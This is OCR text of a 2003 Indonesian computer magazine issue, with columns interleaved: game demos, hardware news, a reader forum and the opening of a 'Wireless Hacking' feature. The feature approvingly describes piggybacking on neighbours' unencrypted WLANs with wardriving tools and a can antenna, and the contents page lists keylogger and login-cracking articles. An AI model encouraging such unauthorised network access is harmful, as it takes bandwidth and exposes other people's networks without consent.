You are on page 1of 50

NeoSoft

Mutant Storm
dan Game ‘Serius’ Lain
Mulai sekarang anda bisa mendapatkan ‘game serius’ atau demo-nya

Reaksi pembaca atas dimuatnya game


pada NeoTek III/5 Mar/Apr 2003 sangat
jelas. Pembaca tidak menginginkan
‘game anak-anak’ melainkan game
yang ‘serius.’ Itu sebabnya mulai nomor
ini NeoTek menyajikan game ‘serius’
atau demonya.
Selain Mutant Storm dapatkan pula
Roller Coaster Tycon 2, Jurrasic
Park: Project Genesis, dan WarCraft
III: Reign of Chaos.
Semua adalah playable demo yang
cukup menantang untuk dimainkan
sebelum memutuskan untuk membe-
linya atau tidak.
Neoteker juga perlu hiburan, kan?

Iklan VisionNet
HomePage

amkm Salam!
anda Wireless Hacking:
meminta Mudahnya ‘Nyantol’ WLAN
kami
mendownload
Software gratis
di Internet?
Tapi besarnya...
50Mb... 200Mb?

sa—elephant • Browsing Internet ke seluruh dunia dengan meminjam akses Internet broadband
milik tetangga. Itulah kegiatan ‘nyantol’ akes Internet yang semakin mudah

sa—gajah
dilakukan secara wireless.

eralatan wireless networking semakin murah dan


Kami dapat
men-
P mudah didapat. Namun antusiasme penerapan
wireless LAN tidak sejalan dengan security-nya.
download- NeoTek menunjukkan, dalam topik Wireless Hacking, betapa
kannya wireless LAN yang seperti ini membuat sistem jaringan
untuk anda. komputer semakin tidak aman saja.

Kirimkan email ke: Redaksi


kosasih_iskandarsjah@yahoo.com redaksi@neotek.co.id
dengan:
• Subject: amkm
• Isi pesan: Mohon download-kan
[nama software] dari
[www.blablabla.com] Bagaimana menghubungi N EOTEK?
KONTRIBUSI ARTIKEL
redaksi@neotek.co.id ADMINISTRASI IKLAN
SURAT PEMBACA Tel. 021-5481457 Fax. 021-5329041
support@neotek.co.id SIRKULASI NEOTEK
WEBMASTER Tel. 021-5481457
webmaster@neotek.co.id ALAMAT REDAKSI
PEMASARAN Gedung Cahaya Palmerah Suite 503
pemasaran@neotek.co.id Jl. Palmerah Utara III No. 9
Jakarta 11480
CHATROOM DI DALNET
#neoteker
MILIS PARA NEOTEKER
http://groups.yahoo.com/group/majalahneotek

Mei/Jun 2003 NeoTek 1


Daftar Isi

Daftar Isi NeoTek Vol. I I I No. 8


WLAN Security
NeoStart 12 Terdapat jurang yang lebar
NeoTutor
antara penerapan WLAN
dengan security-nya. Sebagian besar
Wireless Hacking access point terinstal tanpa menerap- Borland Delphi 7
7 Membandingkan wired-LAN kan enkripsi, sehingga setiap orang 28 Personal Edition
dengan wireless LAN dan me- dapat dengan mudah terhubung Programming tool yang power-
ngapa WLAN lebih rawan penyusupan (associate) dengan access point ful namun juga mudah digunakan. Da-
tersebut. patkan lisensinya, gratis, dari Borland.
Ad-Hoc Mode dan
8 Instalasi Access Point 14 Memahami WarDial
Istilah war driving berasal dari 30 Delphi Tweaking Tool
Belajar Windows security
Akses wireless dapat dilaku- kegiatan hacking di awal-awal sekaligus belajar membuat
kan dengan atau tanpa access point program dengan Borland Delphi 7.
masa Internet, yaitu war dialing, yang
dengan biaya minimal saja.
setara dengan scanning. Hanya ini
C++ Workshop
10 ‘Nyantol’ WLAN
men-scan telepon bermodem.
34 Membuat keylogger
Menunjukkan mudahnya ToneLoc & THC-Scan
‘nyantol’ Internet access
orang serta menyelinap langsung ke
16 Dua wardialer klasik yang ma-
Tip programming C++
dengan bahasan keylogger.
sih layak dipelajari sampai se-
balik NAT proxy! Objek pada JavaScript
karang. Asah keterampilan DOS anda.
36 Bagian terakhir mengenai
sub-bahasan obyek buatan
Metatag untuk
38 Promosi Situs NeoStyle sendiri pada JavaScript.

Pahami cara kerja berbagai


macam search engine untuk dapat me-
manfaatkan mereka sebaik-baiknya.
Saran praktis dari praktisi yang juga 43 Google Hacks
Google pun bisa diutak-atik
NeoReview
pengajar sertifikasi webmaster. untuk mendapatkan manfaat Go Wireless: GPRS
yang sebesar-besarnya. 45 Jangan cuma pakai handphone
untuk SMS/MMS, gunakan juga
www.neotek.co.id
Situs NeoTek neotek.kpone.com.sg
sebagai modem untuk komputer anda.

Go Wireless: Wi-Fi/Laptop
Jadikan situs NeoTek sebagai pangkalan Anda berselancar 46 Kalau berada di kawasan hot
Link Langsung Layanan Rupa-rupa NeoTek spot, laptop dengan WNIC da-
Kunjungi situs-situs yang dibahas di Perlengkapan berinternet dari situs NeoTek pat dipakai untuk browsing.
majalah NeoTek dengan sekali klik
lewat situs NeoTek. Channel #neoteker di Dalnet Go Wireless: Pocket PC
NeoTek versi PDF
Ngobrol ramai-ramai sesama NeoTeker
Web Chat Room
47 hp iPAQ memang standar, tapi
kini ada juga Toshiba e740
Kehabisan NeoTek di kota Anda? Kini tidak usah jauh-jauh untuk ngobrol
yang full-wireless, selain juga Linux-
Dapatkan saja versi PDF-nya. Gratis! langsung dengan sesama NeoTeker
based PDA
Mailing List
Download Ini yang paling ramai. Segera ikutan Xnuxer Linux:
Tersedia juga download di situs
NeoTek selain dari situs aslinya
berbagi pengalaman berinternet! 48 Distro Linux Satu Disket
NeoTeker Official Portal Linux mini-distro hasil karya
http://neotek.portal.dk3.com putra Indonesia. Cocok untuk mulai
Situs komunikasi antar Neoteker.
belajar Linux tanpa merepotkan partisi.

2 NeoTek Mei/Jun 2003


Daftar Isi

NeoSoft
FOKUS BULAN INI MutantStorm
0 Diangkat dari
cerita klasik RoboTron,
permainan ini benar-benar
untuk pencinta action. Versi
demo ini terdiri dari 9 level.

NeoProfil
Kru NeoTek
3 Bermarkas di
Gedung Cahaya Palmerah 503
Wireless Hacking Jl. Palmerah Utara III No. 9

Mudahnya Nyantol WLAN Orang Jakarta 11480


Telp. 021-5481457
Fax. 021-5329041

Policy On/Off dengan Pemimpin Umum

NeoTekno 22 VBScript Fachri Said


Registry tool dapat dibuat hanya Pemimpin Redaksi
dengan VBSCript pada halaman web. Kosasih Iskandarsjah
Windows Security Redaktur Ahli
Bypass Larangan Onno W. Purbo

18 Poledit: Password Policy


Membahas salah satu policy
24 RegEdit Michael S. Sunggiardi
Regedit di-nonaktifkan orang Pemimpin Usaha
penting, yaitu password policy, lain? Bypass dengan membuat registry Fahmi Oemar
serta hubungan policy dengan regedit. file khusus untuk mem-bypass-nya. Juga Ridwan Fachri
dibahas cara menjebol login password Redaktur Pelaksana
Policy pada Windows 98 maupun melumpuhkan poledit.
20 Membahas policy sehubungan
Gianto Widianto
Dadi Pakar
dengan Windows Explorer, men- MS Baseline Security
cakup menampilkan/menyembunyikan 26 Analyzer Sekretaris Redaksi
Marni
drive pada tampilan Windows Explorer Repot meng-update dan mem-
serta menyembunyikan regedit.exe itu patch Windows security? Kini ada MBSA Dewan Redaksi
sendiri yang digunakan untuk mene- yang memudahkan pekerjaan anda David Sugianto, Albert Siagian
tapkan policy pada Windows. sebagai admin jaringan. Asmuri Anwar, MA Rody C.
Webmaster
NeoTek Jun/Jul 2003 Supriyanto
NeoRagam Pemasaran
Wireless Device
Klak Klik
4 Bukan Mainan Anak
Windows Server 2003
Programming
Java kini diposisikan sebagai wireless
Hedhi Sabaruddin, Denny
Tuti Sundari, Arinto
Centrino Mobile Technology device programming tool, baik de- Iklan dan Promosi
ngan J2ME maupun dengan UIQ Hedhi Sabaruddin
802.16: Alternatif
5 terhadap Cable dan DSL
Broadband
Technology pada Symbian OS. Mari
belajar membuat program untuk
Keuangan
Aswan Bakri
GPRS: Evolusi GSM 2G ke handphone anda.
2.5G
Memahami Nokia Bank
Inbox Ringtone
Nokia ringtone menggunakan bahasa Bank BNI

6 NmN
Neoteker menjawab Neoteker
pemrograman sendiri, yaitu RTTL
yang dapat dikonversi ke keypress
a.n. PT NeoTek Maju Mandiri
No. rekening 070.001709720.001
maupun ke notasi balok. Asah bakat Bank BCA KCP Rawamangun
Daftar Isi CD NeoTek
44 musik anda dengan Nokia. a.n. Aswan Bakri
No. rekening 0940544131

Mei/Jun 2003 NeoTek 3


NeoRagam

Klak Klik BARANG BARU... BARANG BARU...

BUKAN MAINAN ANAK Windows Server 2003


NeoTek kena protes karena memuat
‘game anak-anak.’ Memang game khir April 2003 (US) secure connectivity, dan cen-
sekarang bukan lagi mainan anak-
anak, seperti playable demo bebe-
rapa game populer yang dimuat di
A dan pertengahan Mei
2003 (Asia), Micro-
tralized desktop application
deployment.
CD NeoTek kali ini. soft meluncurkan produk Enterprise Edition
terbarunya, Windows Server mendukung sampai 8
Roller Coaster Tycoon 2 2003, yang dibentuk dari pe- buah prosesor atau mesin
68.41 MB ngembangan Windows 2000. Web
Itamium 64-bit, eight-node
Pada setiap versi Windows clustering dan mendukung Edition
Server 2003 terdapat IIS 6.0 memori sampai 32 Gbyte. adalah produk
web server yang kini lebih baru di jajaran Windows Ser-
Datacenter Edition adalah ver yang dirancang untuk
secure. Default installation versi paling powerful yang
pada IIS 6.0 adalah lock pengembangan dan hosting
mendukung RAM 32-bit web application, web pages,
down. sampai 64 Gbyte, 64 buah dan XML web service.
Ada empat versi Windows prosesor, dan 512 Gbyte Dirancang khususnya untuk
Server 2003: Standard Edition, RAM 64-bit. Mencakup bekerja bersama IIS 6.0 dan
Enterprise Edition, Datacenter Windows System Resource dengan mudah
Edition, dan Web Edition. Manager untuk memfasili- mengembangkan XML
Belajar mengelola bisnis
taman hiburan. Siapa tahu Standard Edition mendu- tasi konsolidasi dan system application menggunakan
nanti bisa menjadi peng- kung file dan printer sharing, management. teknologi ASP.NET.
usaha theme park sukses
menyaingi Dunia Fantasi.
Pentium 300, RAM64

WarCraft III:
Centrino Mobile Technology
Reign of Chaos Centrino ada- menemui lagi PS2 maupun Dell Latitude D600
99.8 MB lah chipset bun- serial port, melainkan USB 2.0, IBM Thinkpad T40 terlalu ma-
dle keluaran IrDA, parallel, dan video/S- hal? Pertimbangkan alternatif
Intel yang ter- video output. dari Dell Latitiude D600 yang
diri dari prose- Berikut adalah spesifikasi IBM selain penampilannya jauh
sor Pentium M, Thinkpad T40: lebih elegan untuk keperluan
suatu chipset, corporate, juga menggunakan
dan Wi-Fi chip. Pentium M wa- Prosesor Pentium M 1.6GHz Intel Centrino chipset bundle.
laupun hanya 1.6GHz, namun RAM 512MB (max. 2048MB)
kinerjanya melebihi Pentium 4 Prosesor Pentium M 1.6GHz
Harddrive IDE 80 Gbyte RAM 512MB (max. 2048MB)
2.0 GHz. Malah kinerja Pentium
M dapat disamakan dengan CD/DVD CD RW/DVD ROM Harddrive IDE 40 Gbyte
Role playing strategy game Pentium 4 2.4 GHz. Display TFT max. 1400 x 1050 CD/DVD CD ROM
yang menggabungkan indi- Pentium M lebih hemat energi, Colour 24 bit (16,7 juta warna)
vidual combat maupun stra- Display TFT max. 1400 x 1050
tidak banyak menghasilkan pa- Video/audio RAM 32MB, ATI
tegi untuk menaklukkan nas, sehingga laptop yang Colour 24 bit (16,7 juta warna)
musuh. Mobility Radeon 9000,
Pentium 400 RAM128 8MB video menggunakan Pentium M akan sound card Video/audio RAM 32MB, ATI
card, DirectX dapat memanfaatkan baterai Mobility Radeon 9000,
sekitar 4 sampai 4,5 jam, diban- Network Modem 56kbps, sound card
dingkan biasanya yang 1 sam- 10/100/1000 Ethernet,
Jurrasic Park: Wi-Fi, Bluetooth Network Modem 56kbps,
Operation Genesis pai 1,5 jam. 10/100/1000 Ethernet,
78.23 MB Expansion 2 (1 free) memory slot Wi-Fi, Bluetooth
IBM Thinkpad T40 Connectivity 2 USB 2.0, 1 IrDA, 1 Expansion 2 memory slot, PC card
IBM Thinkpad T40 merupakan parallel, 1 Video/S-video
Connectivity 2 USB 2.0, 1 IrDA, 1 paralle
laptop terbaik yang ada seka- Software Windows XP Professional
rang ini. Selain menggunakan Software Windows XP Professional
Harga SGD4000
titanium casing seperti semua Harga SGD3500
Thinkpad seri T, IBM
Thinkpad T40 memanfaatkan
Intel Centrino chipset bundle.
Perbedaan yang langsung
terlihat pada laptop tipe
Rancang dan kelola dinosaur terbaru dari IBM ini justru
theme park yang masih da- bukannya teknologi Intel
lam pengembangan di Blue Centrino-nya, melainkan
Tongue atau bertempur da- hilangnya port-port
-lam 12 jenis misi melawan tradisional yang biasa
kekuatan alam maupun ada pada
makhluk luar biasa. komputer.
Pentium 600, RAM128 Anda
tidak

4 NeoTek Mei/Jun 2003


NeoRagam

BROADBAND CONNECTION UNTUK RAKYAT BANYAK

802.16: Alternatif terhadap Cable dan DSL Broadband


usahaan terkemuka seperti T1. Ini merupakan peluang perluas jangkauan pelayan-
Nokia, Ensemble, Intel, dan bagi perusahaan-perusaha- annya.
Fujitsu. an telepon untuk memper- Harga modem 802.16 masih
Standar 802.16 memung- luas pelayanan broadband mahal (USD1000) diban-
kinkan broadband access access-nya sampai ke pede- dingkan dengan wireless
khirnya muncul juga saan. Kelak akan ada tiga
A harapan pada rakyat
dari jarak sampai 30 mil
dengan kecepatan sampai cara untuk menyediakan
card (802.11) yang sudah di
bawah USD50. Diperkirakan
banyak untuk dapat menik- 70 Mbps. Ini artinya akses broadband untuk tidak lama lagi modem 802.16
mati akses Internet broad- memungkinkan menyedia- umum: DSL, Cable, dan ini akan turun sampai
band murah. Harapan itu kan akses Internet broad- Wireless Broadband dengan USD300.
datang dari standar teknis band ke daerah-daerah protokol 802.16.
802.16 yang promosi adop- Sebenarnya WiMAX
pedesaan yang sampai kini Penyedia wireless Internet mempromosikan teknologi
sinya dilakukan WiMAX secara ekonomis tidak di- access jarak jauh ini bisa saja
(World Interoperatibility yang sudah ada sejak 5 ta-
mungkinkan oleh Cable adalah para penyedia hot spot hun yang lalu, namun pada
for Microwave Access). atau DSL. (wireless access Wi-Wi pro- waktu itu masih dianggap
WiMAX, suaiu lembaga Biaya pembangunan net- tokol 802.11) yang juga belum siap untuk diaplika-
non-profit keanggotaannya work 802.16 hanya separuh menggunakan peralatan ber- sikan secara massal.
terdiri dari perusahaan-per- biaya memasang jaringan standar 802.16 untuk mem-

GPRS: Evolusi GSM 2G ke 2.5G GPRS dapat memfungsikan handphone


anda sebagai modem

istem telepon selular GPRS relatif pemakai te- bangkan oleh


S generasi pertama meng- lepon selular sudah dapat para operator
gunakan sistem analog. Ma- mengintegrasikan suara, GSM sendiri.
sih ingat dengan sistem Internet (masih narrow-
AMPS? band), dan multimedia 3G Mobile Phone
message (MMS) walaupun Setelah NTT
2G Mobile Phone belum multimedia service. DoCoMo me-
Sistem telepon seluler yang Pemakai telepon seluler lakukan uji
kini paling banyak digunakan CDMAone seperti di Ame- coba 3G sejak
di seluruh dunia, yaitu sistem rika justru tidak mengenal 2001, kini sa-
GSM termasuk dalam tele- SMS apalagi MMS. ingannyan,
pon seluler generasi kedua KDDI, melun-
atau 2G Adapun telepon seluler ge- curkan tekno-
nerasi ketiga atau 3G akan logi 3G. KDDI
Setelah GSM, teknologi 2G menggabungkan suara, In-
yang kedua populer adalah meluncurkan
ternet, dan layanan multi- layanan 3G
CDMAone (dulu dikenal media seperti video-on-de-
sebagai IS95a) dan banyak sejak April
mand pada telepon seluler 2002 di Jepang
digunakan di Amerika serta anda.
Korea. Di Jepang teknologi menggunakan
2G yang dipakai lain lagi, Telepon seluler 3G akan spesifikasi
yaitu Personal Digital menggunakan teknologi CDMA2000
Cellular (PDC). CDMA2000. Sistem 3G di- 1x dengan kecepatan akses Hambatan lain dari peneri-
definiskan oleh ITU (Inter- data 144 kbps. Jepang kini maan pasar untuk 3G ada-
Pemanfaatn GSM yang po- national Telecommunica- merupakan pasar telepon lah makin populernya Wi-
puler justru bukan fungsi tion Union) sebagai IMT- seluler paling maju di dunia. Fi, yaitu wireless Internet
suaranya, melainkan fungsi 2000 dengan kemampuan connection menggunakan
teks (SMS) menggantikan Namun tampaknya perkem-
menangani akses data 144 bangan 3G di luar Jepang protokol 802.11. Walaupun
popularitas pager belasan kbps sampai 2 Mbps. sebenarnya Wi-Fi dan 3G
tahun yang lalu. SMS kini terhambat. Selain karena
mahalnya membangun in- membidik pasar yang ber-
berkembang ke MMS (mul- Sebenarnya dengan GPRS
frastruktur untuk sistem beda. Anda bisa membawa
timedia message system) banyak fungsionalitas yang
3G (juga mahalnya lisensi handphone ke mana-mana
pada telepon seluler dengan ingin dicapai dengan 3G da-
CDMA yang dilelang masing- setiap saat, tapi tidak laptop
fasilitas GPRS. pat diberikan oleh 2.5G, na-
masing pemerintah suatu ke mana-mana, bukan? Tapi
mun teknologi GPRS sen-
nnegara), juga karena suk- bagaimana apabila kemam-
2.5G Mobile Phone diri tidak dinamakan 3G
sesnya teknologi GPRS puan PDA yang semakin
GPRS dikembangkan dari sebab menggunakan stan-
yang memperkaya tekno- seukuan handphone sema-
GSM dan dikenal sebagai dar yang sama sekali ber-
logi GSM dan dikenal se- kin dekat saja dengan ke-
2.5G mengingat dengan beda dengan standar ITU,
bagai teknologi 2.5G ini mampuan laptop?
yaitu standar yang dikem-

Mei/Jun 2003 NeoTek 5


Inbox

NmN
NeoTeker menjawab NeoTeker
Forum ini dimaksudkan sebagai bentuk offline dari mailing list
NeoTek di http://groups.yahoo.com/group/majalahneotek.

Drive Access Control J: Posted April 24 Masalah Mandrake 9 dan jalankan perintah chmod
pake pmagic... trus pilih lin- 700 /usr
T: Posted April 21 drive nya... pencet tombol T: Posted April 2 Asmuri Anwar
Ada gak program yang mem- kanan... pilih delete... pencet Wah lagi2 ttg Mandrake 9.0. asmuri@atherozconnection.net
batasi akses ke drive. Misal: apply... trus buting deh Ssetelah dicoba2 lagi, ter-
harus memasukkan pass- klo mo ngilangin lilo/grub... nyata ada beberapa error yang
word setiap klik drive D di muncul setelah upgrade Hosting PHP Gratis
ketik "fdisk /mbr"
my computer. Saya udah KNSY...(klo nggak salah 1. Setelah pake perintah su, T: Posted April 4
coba folderguard, tapi kayak- ya...huehehe) muncul kesalahan :
nya kurang simple dan gak bash: dircolors: command not found Gimana sih cara ngedaftar
-temenbaek- web hosting di ortland.co.uk
jalan kalo pake win2K. bash: locale: command not found
m28ew bash: tty: command not found Saya sudah keliling di situs
Tantan Darmakusumah itu kagak ketemu form utk
m28ew@mailcity.com bash: tty: command not found
mbmainte@int.mew.co.jp mendaftarnya (yang
2. beberapa perintah com-
mand line gak isa diakses: gratisan)
J: Posted April 21 Downgrade dari SP6
man, clear, shutdown (harus Bandar Cabe
Ubah ke NTFS dan gunakan T: Posted April 2 root, padahal biasanya user redhatchilipeppers@yahoo.com
Rights untuk setiap user, ngga biasa udah bisa), whoami,
perlu program tambahan. Saya baru saja upgrade J: Posted April 5
WINNT4 dari SP3 ke SP6, finger, dll
Albert Siagian ternyata setelah pakai 3. beberapa program juga Halo Bandar Cabe,
asiagian@gmx.net service pack 6 progi Building agak "kaca,” ontohnya Ini URL-nya:
Automation System (BAS) KMail (Icon Foldernya jadi http://www.portland.co.uk/
T: Posted April 21 hilang) freesubdomainapp.esp
Jadi tidak jalan. Ada ngak
Gimana caranya convert... rekan-rekan yang tahu Kira2 ada yg salah pada Sekali lagi saya mau
Aku udah coba ke control untuk mengembalikan dari waktu upgrade atau ada yg mengingatkan, kalau buka
panel>admin, tapi disana SP6 ke SP3 (downgrade) lagi kurang pada waktu upgrade account gratis di Portland,
tidak bisa convert kalo drive selain install ulang (perasaan sudah semua ada baiknya mengikuti maillist
c: (system). Saat ini Win2K diupgrade dech) resminya di:
saya pake FAT. Joko Sutrisno http://groups.yahoo.com/group/
Willy Sudiarto Raharjo
j_sutrisno@cbn.net.id portlandfreeweb
Tantan Darmakusumah willy@e-jogja.net
mbmainte@int.mew.co.jp J: Posted April 2 Juneman
J: Posted April 2 juneman@gmx.de
Waktu install SP 6 kan ada
J: Posted March 5 pertanyaan mau SP lama di Kemungkinan besar id dan
backup atau di timpa. Kalau dircolors yang berada di InulLinux
Start, Programs, Accesories, /usr/bin tidak dapat di-
Command Prompt, anda pilih backup, tinggal
masuk Control Panel, Add/ mountoleh sistem, sehingga T: Posted April 7
CONVERT C: /FS:NTFS, filesystem bentrok dan
Remove dan hapus SP6. Inul kan emang identik dg
Enter, Restart. kebingungan' gimana me- para pekerja TI ;-p apalagi
Albert Siagian Albert Siagian mount harddisk Anda. pecinta Linux kayak
asiagian@gmx.net asiagian@gmx.net Untuk mengatasinya, cobalah pak IMW. Coba cek aja di
masukkan bootdisk, kemudian http://inullinux.pandu.org
J: Posted April 3 jalankan dengan mode rescue
Uninstall Mandrake triyan@hotpop.com
Sebetulnya versi yang terakhir
T: Posted April 24 adalah SP6a (bukan SP6), dan
Bagaimana menghapus itupun masih ada beberapa
(uninstal) Mandrake9 dan patches kecil. Coba saja setelah
bagaimana menghapus anda install, jalankan Windows
partisi linux dg partition Update (Internet Explorer,
magic (saya memakai Tools, Windows Update) dan
operasi Windows 98 dan juga MBSA (Microsoft
Mandrake 9).Terima kasih Baseline Security Analyzer).
husni_adunk Albert Siagian
husni_adunk@yahoo.com asiagian@gmx.net

6 NeoTek Mei/Jun 2003


NeoStart

WI R E LE SS HAC K I N G
‘Nyantol’ WLAN
Wireless LAN dapat digunakan secara lokal maupun untuk
terhubung dengan ISP. Koneksi Wireless LAN menggunakan
sinyal radio, yang artinya tidak ada perlindungan fisik
(dibandingkan kabel pada LAN biasa).
• NetStumber adalah induk segala wireless
Setiap orang bisa nyantol bandwidth seperti maling listrik. network scanning tool. Berjalan pada Windows.

AMAI-RAMAI WIRELESS LAN SUDAH DIMULAI SEJAK Apa yang Diperlukan untuk ‘Nyantol’ Bandwidth
R tahun lalu, dan NeoTek sudah ikut meramaikan
dengan memuat artikel Onno W. Purbo tentang
Dengan ‘nyantol’ bandwidth artinya kita tidak memben-
tuk wireless LAN kita sendiri, melainkan mengakses wi-
wireless LAN di NeoTek II/6 dan II/8 (Maret & Juni 2002).
reless LAN orang lain. Pada dasarnya alat yang diperlu-
Pada bahasan kali NeoTek akan kembali membahas dasar- kan hanyalah WNIC. Berbeda dengan NIC yang relatif
dasar wireless LAN, namun dengan fokus terhadap sisi standar, WNIC berbeda fungsionalitasnya satu sama lain.
security dari wireless LAN. Di sini diperkenalkan istilah
Untuk mengakses wireless LAN seizin pemilik network,
war driving (yang setara dengan scanning pada network
dapat digunakan WNIC merek apa saja. Anda tinggal me-
security). Dengan war driving anda bisa ikut ‘nyatol’ akses
nyetel WNIC anda agar mengenali SSID wireless network
Internet orang, yang ternyata sangat mudah dilakukan
serta listen pada channel yang digunakan.
karena sebagian besar penerapan wireless LAN ternyata
tidak mengaktifkan fasilitas enkripsinya dan mengguna- Untuk ‘nyantol’ masalahnya lebih rumit sebab pertama
kan default configuration. anda harus mencari dulu wireless LAN orang yang dapat
dicantol. Untuk itu (mungkin) diperlukan WNIC yang
Membandingkan Wireless LAN dan Wired LAN menggunakan antena tambahan, selain WNIC itu harus
Bila anda memahami LAN, maka untuk memahami wireless mampu menjalankan progam pencari sinyal (war driving).
LAN tidaklah sulit. Bila pada LAN (wired LAN) anda meng- Tidak semua WNIC mampu mengenali war driving soft-
gunakan kabel untuk menghubungkan perangkat-perangkat, ware. Hanya WNIC yang Wi-Fi compliant seperti Lucent’s
maka wireless LAN menggunakan gelombang radio. ORiNoCO, Avaya, Toshiba 802.11b wireless card, Dell
Bila pada LAN komputer yang akan saling dihubungkan TrueMobile 1150, Compaq WL110, dan beberapa yang lain.
ke LAN perlu dipasangkan NIC (network interface card), WNIC seperti dari LinkSys, D-Link, ataupun SMC me-
maka pada wireless LAN harus dipasangkan WNIC (wire- mang lebih murah (dibawah SGD100), tetapi tidak dike-
less network interface card). nali oleh war driving software seperti Net Stumbler.
Dua komputer yang masing-masing mempunyai NIC dapat Biasanya WNIC yang Wi-Fi compliant ini harganya lebih
dihubungkan satu sama lain menggunakan cross-over cable, mahal (sekitar SGD 200), tetapi selain dapat dikenali oleh
maka komputer-komputer yang mempunyai WNIC dapat NetStumbler, juga dapat dipasangkan external antenna
saling berhubungan satu sama lain membentuk peer-to-peer agar dapat menangkap sinyal wireless LAN yang lebih
networking. Pada wireless LAN anda tidak usah memusing- lemah dan lebih jauh jangkauannya.
kan soal cross-over atau straight seperti pada wired LAN.
Keterbatasan pada WNIC-nya tidak membuat rekan Judhi
Bila lebih dari satu komputer hendak dihubungkan dalam Prasetyo (judhi@prasetyo.net) putus asa. Secara kreatif ia
network satu sama lain, maka pada LAN harus digunakan menggunakan antenna kaleng bekas untuk nyantol akses
hub dan setiap komputer terhubung ke hub tersebut melalui Internet tetangga.
straight cable. Pada wireless LAN lebih dari dua komputer
dapat terhubung satu sama lain tanpa alat setara dengan hub.
Peranti pada wireless LAN yang setara dengan hub dikenal
sebagai access point (AP). Apabila pada LAN jumlah kompu-
ter yang dapat dihubungkan ke hub tergantung jumlah port
yang disediakan, maka pada wireless LAN, jumlah komputer
yang dapat dihubungkan sebanyak maksimum 32 komputer,
tergantung pada apakah terdapat interferensi satu sama lain.
Apabila pada LAN koneksi terlindung secara fisik dengan
kabel koaksial, maka pada wireless LAN yang menggunakan
gelombang radio 2,4GHz, perlindungan fisik seperti ini tidak
ada. Setiap orang yang dapat menangkap sinyal wireless LAN,
mengetahui SSID (Service Set Identifier) wireless LAN ter-
sebut, bisa menakses wireless network tersebut. Apabila wire-
less LAN tersebut juga merupakan mekanisme untuk Internet
sharing, maka pengakses dapat menikmati akses Internet gra- • Nyantol WLAN apartemen seberang menggunakan antena kaleng
tis dengan biaya pemilik wireless LAN (‘nyantol’ bandwidth). yang ditancap langsung pada konektor WLAN USB card.

Mei/Jun 2003 NeoTek 7


NeoStart

WI RE LESS HAC KI NG
ERIKUT INI DIPERLIHATKAN DUA CONTOH
B wireless access. Yang pertama ada-
lah wireless access antara sesama
komputer yang sudah terpasang WNIC tan-

AD HOC MODE WLAN & pa melibatkan access point AP. Ini dikenal
sebagai ad hoc mode WLAN atau IBSS
(IIndependent Basic Service Set). Kedua

INSTALASI ACCESS POINT komputer yang dicontohkan menggunakan


versi Windows yang berbeda serta jenis
WNIC yang berbeda pula (hlm. 8).
Kedua (hlm. 9) menunjukkan instalasi AP
Memahami istilah-istilah dalam wireless LAN paling mudah yang merupakan perluasan dari peer-to-peer
dengan praktek langsung. Disini diperlihatkan cara network yang sudah ada, yaitu dengan jalan
membentuk ad hoc network antara komputer-komputer menghubungkan AP pada salah satu port
pada router.. Pada dasarnya AP menjalankan
dengan WNIC (tanpa adanya AP) serta instalasi AP WLAN pada infrasturucture mode (dikenal
memperluas wired network yang sudah ada. sebagai ESS atau Extended Service Set).

Menghubungkan dua komputer yang telah mempunyai WNIC membentuk ad hoc mode WLAN

WIRELESS CLIENT MANAGER BUAT PROFILE BARU NETWORK NAME


1 Pada contoh ini salah satu kom-
puter menggunakan Avaya Gold
2 Buat profile baru (disini dinama-
kan Peer-to-Peer at Cairnhill)
3 Dengan mengklik Edit Profile akan
tampil window untuk menetapkan
WNIC pada Windows 98. Aktifkan dan pilih sebagai Peer-to-Peer Network Name. Namakan saja
Avaya Wireless Client Manager Group (ada opsi lain yaitu Workgroup, disamakan dengan
dengan mengklik ikon pada Access Point dan Residential workgroup name pada bagian Pro-
taskbar. Lalu pilih Actions > Gateway). Access Point untuk perties dari Network Neighborhood
Add/Edit Configuration Profile. koneksi ke AP dan Residential kedua komputer yang akan dihu-
Gateway untuk ke ISP. bungkan lewat WNIC.

PILIH PROFIL PEER-TO-PEER TERLIHAT KOMPUTER LAIN AD-HOC NETWORK


4 Apabila profil Peer-to-Peer diak-
tifkan maka terlihat Client Mana-
5 Terlihat komputer lain yang meng-
gunakan WNIC dengan tipe Peer-
6 Klik ikon Network Neighborhood
dan terlihat dua komputer yang
ger akan mencari komputer lain to-Peer juga pada channel 10. Di masing-masing terpasang WNIC
yang menggunakan WNIC pada sini adalah Windows XP dengan ini, kini membentuk suatu ad-hoc
workgroup yang sama. Pilih WNIC SMC2632W. Pada XP, wire- network dengan Peer-to-Peer
Advanced > Site Monitor dan less connection di-setup langsung Networking. Ad-hoc network
klik OK lewat XP tanpa client manager. XP dapat dibentuk oleh lebih dari
sangat wireless friendly. dua komputer.

8 NeoTek Mei/Jun 2003


NeoStart

Bahasan mengenai instalasi router yang dap wireless security. Seorang karya- Security feature yang perlu diperhatikan:
dimaksud (SMC barricade) terdapat wan dapat memasang AP-nya sendiri • WEP encryption
pada NeoTek II/2 November 2001. sebagai perluasan network perusaha- • Membatasi koneksi berdasar MAC
Jadi disini selain komputer-komputer annya secara diam-diam. AP liar ini address
yang terhubung dengan kabel ke rou- dikenal sebagai rogue AP. • Kemampuan men-disable beacon
ter, dapat terhubung juga komputer- Tidak seperti memilih WNIC yang broadcast (broadcast SSID dan time
komputer lewat AP secara wireless lebih harus hati-hati, justru AP lebih stamp secara periodik
membentuk peer-to-peer networking tidak rewel. AP merk apa saja dapat Berikut adalah daftar harga perangkat
serta Internet access sharing. berfungsi dengan baik sebagai pintu yang digunakan dalam pengujian dalam
AP dapat disetarakan dengan hub masuk ke network (maka namanya membuat artikel ini.
pada LAN biasa. Ke AP ini anda access point).
Daftar Harga
dapat menghubungkan komputer Pemilihan AP akan lebih didasarkan SMC2632W NIC SGD95
yang telah dipasangkan WNIC pada security feature yang disedia- Avaya Gold NIC SGD168
maupun AP lain lagi. kannya, tapi pada dasarnya hampir SMC2655W v.2 AP SGD199
Murah dan mudahnya instalasi AP semua AP yang beredar sekarang SMC Barricade Router SGD105
menjadi kepusingan tersendiri terha- sudah menyediakan security feature
yang memadai.

Instalasi SMC2655 v.2 Access Point pada SMC Barricade Router

INSTALASI AP UTILITY BROWSE ACCESS POINT SSID, CHANNEL, IP ADDRESS


1 AP harus terhubung ke komputer
instalasi lewat kabel ethernet, baik
2 Begitu AP Utility dijalankan akan
tampil window yang browse AP
3 Info menunjukkan SSID (default
WLAN), channel (default 1), AP’s
langsung atau (dalam hal ini) lewat pada network anda. Akan didapat name (default MiniAP), dan IP
